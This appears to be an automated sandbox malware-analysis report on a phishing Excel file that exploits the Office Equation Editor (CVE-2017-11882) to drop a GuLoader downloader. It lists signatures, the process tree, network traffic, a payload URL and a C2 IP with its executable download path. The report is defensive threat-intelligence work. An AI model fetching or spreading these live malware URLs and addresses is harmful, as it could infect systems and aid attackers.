Play interactive tour

Edit tour

Windows Analysis Report new order requirment-21 July.xlsx

Overview

General Information

Sample Name:	new order requirment-21 July.xlsx
Analysis ID:	451759
MD5:	25f7735ff71a70abf4bb508d2711f50b
SHA1:	7f40fff223019a3e399ca0ae0990afaf2695e93b
SHA256:	821f2880a8218afc0d30711b46f7d28e9adb2cd6c3db88b881de91090e72337f
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Drops PE files to the user root directory

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2796 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 552 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2708 cmdline: 'C:\Users\Public\vbc.exe' MD5: 19CAC1EE3A6E5E9F83054616F5D5CE6F)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://kinmirai.org/wp-content/bin_lOulvHP91.bip"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
C:\Users\Public\vbc.exe	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
00000006.00000000.2137818883.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.vbc.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
6.0.vbc.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 552, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 552, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 552, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_lOulvHP91.bip"}

Multi AV Scanner detection for domain / URL

Show sources

Source: http://180.214.239.39/service/.svchost.exe

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	Virustotal: Detection: 14%			Perma Link
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 14%			Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: new order requirment-21 July.xlsx	Virustotal: Detection: 30%			Perma Link
Source: new order requirment-21 July.xlsx	ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\typo.pdb source: .svchost[1].exe.4.dr

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://kinmirai.org/wp-content/bin_lOulvHP91.bip

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jul 2021 06:30:40 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 20 Jul 2021 21:04:05 GMTETag: "3c468-5c79464e23873"Accept-Ranges: bytesContent-Length: 246888Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1c e1 51 55 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 03 00 00 70 00 00 00 00 00 00 30 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 10 00 00 62 71 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 03 00 28 00 00 00 00 50 03 00 b4 54 00 00 00 00 00 00 00 00 00 00 50 b0 03 00 18 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 24 03 00 00 10 00 00 00 30 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 40 03 00 00 10 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b4 54 00 00 00 50 03 00 00 60 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View

IP Address: 180.214.239.39 180.214.239.39

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Source: global traffic

HTTP traffic detected: GET /service/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE6E00F3.emf

Jump to behavior

Source: global traffic

Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: DE6E00F3.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F53FF NtAllocateVirtualMemory,	6_2_002F53FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F5541 NtAllocateVirtualMemory,	6_2_002F5541
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F53FB NtAllocateVirtualMemory,	6_2_002F53FB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F53FF	6_2_002F53FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2407	6_2_002F2407
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F207C	6_2_002F207C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F444B	6_2_002F444B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F5844	6_2_002F5844
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7CB7	6_2_002F7CB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F38B4	6_2_002F38B4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8C81	6_2_002F8C81
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F40EF	6_2_002F40EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F04C0	6_2_002F04C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F58D6	6_2_002F58D6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F293F	6_2_002F293F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2567	6_2_002F2567
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F6D5C	6_2_002F6D5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F51A4	6_2_002F51A4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F01E9	6_2_002F01E9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F21DB	6_2_002F21DB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F01DA	6_2_002F01DA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F05D8	6_2_002F05D8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7229	6_2_002F7229
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F0626	6_2_002F0626
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F1207	6_2_002F1207
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8605	6_2_002F8605
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F824D	6_2_002F824D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F2A43	6_2_002F2A43
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7EB4	6_2_002F7EB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3EB2	6_2_002F3EB2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7AEF	6_2_002F7AEF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F06E2	6_2_002F06E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7AF5	6_2_002F7AF5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F26CA	6_2_002F26CA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3EC0	6_2_002F3EC0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F06D2	6_2_002F06D2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F1B2E	6_2_002F1B2E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F1B24	6_2_002F1B24
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F1706	6_2_002F1706
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F6F73	6_2_002F6F73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F4345	6_2_002F4345
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8B5E	6_2_002F8B5E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8B51	6_2_002F8B51
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FA8	6_2_002F3FA8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F37A5	6_2_002F37A5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FE9	6_2_002F3FE9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3BE2	6_2_002F3BE2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F47FF	6_2_002F47FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F53FB	6_2_002F53FB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FC2	6_2_002F3FC2

Source: new order requirment-21 July.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/19@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$new order requirment-21 July.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD6DE.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: new order requirment-21 July.xlsx	Virustotal: Detection: 30%
Source: new order requirment-21 July.xlsx	ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: new order requirment-21 July.xlsx

Static file information: File size 1242112 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\typo.pdb source: .svchost[1].exe.4.dr

Source: new order requirment-21 July.xlsx

Initial sample: OLE indicators vbamacros = False

Source: new order requirment-21 July.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000006.00000002.2351636945.00000000002F0000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Show sources

Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2351658606.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2137818883.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002212F5 push edx; ret	6_2_00221321
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221023 push edx; ret	6_2_00221051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222823 push edx; ret	6_2_00222851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224023 push edx; ret	6_2_00224051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00227024 push edx; ret	6_2_00227051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225825 push edx; ret	6_2_00225851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224833 push edx; ret	6_2_00224861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223033 push edx; ret	6_2_00223061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221833 push edx; ret	6_2_00221861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226034 push edx; ret	6_2_00226061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220038 push edx; ret	6_2_00220061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224803 push edx; ret	6_2_00224831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223003 push edx; ret	6_2_00223031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221803 push edx; ret	6_2_00221831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226004 push edx; ret	6_2_00226031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220008 push edx; ret	6_2_00220031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223813 push edx; ret	6_2_00223841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225013 push edx; ret	6_2_00225041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222014 push edx; ret	6_2_00222041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226814 push edx; ret	6_2_00226841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220818 push edx; ret	6_2_00220841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223063 push edx; ret	6_2_00223091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221863 push edx; ret	6_2_00221891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224863 push edx; ret	6_2_00224891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226065 push edx; ret	6_2_00226091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220068 push edx; ret	6_2_00220091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222074 push edx; ret	6_2_002220A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223874 push edx; ret	6_2_002238A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225074 push edx; ret	6_2_002250A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226875 push edx; ret	6_2_002268A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220878 push edx; ret	6_2_002208A1

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
